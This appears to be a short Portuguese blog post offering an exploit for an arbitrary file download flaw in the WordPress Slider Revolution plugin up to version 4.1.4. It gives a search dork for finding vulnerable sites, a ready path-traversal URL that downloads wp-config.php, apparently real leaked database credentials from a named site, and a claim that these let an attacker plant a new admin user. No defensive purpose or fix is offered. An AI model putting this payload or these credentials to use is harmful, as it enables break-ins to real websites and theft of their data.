0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download
Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem
- define('DB_NAME', 'lojaphos'); Nome do banco de dados
- define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
- define('DB_PASSWORD', 'silva2805'); Senha do banco
- define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
0x Explorando
Dork revslider.php "index of"
http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Este comentário foi removido por um administrador do blog.
ResponderExcluir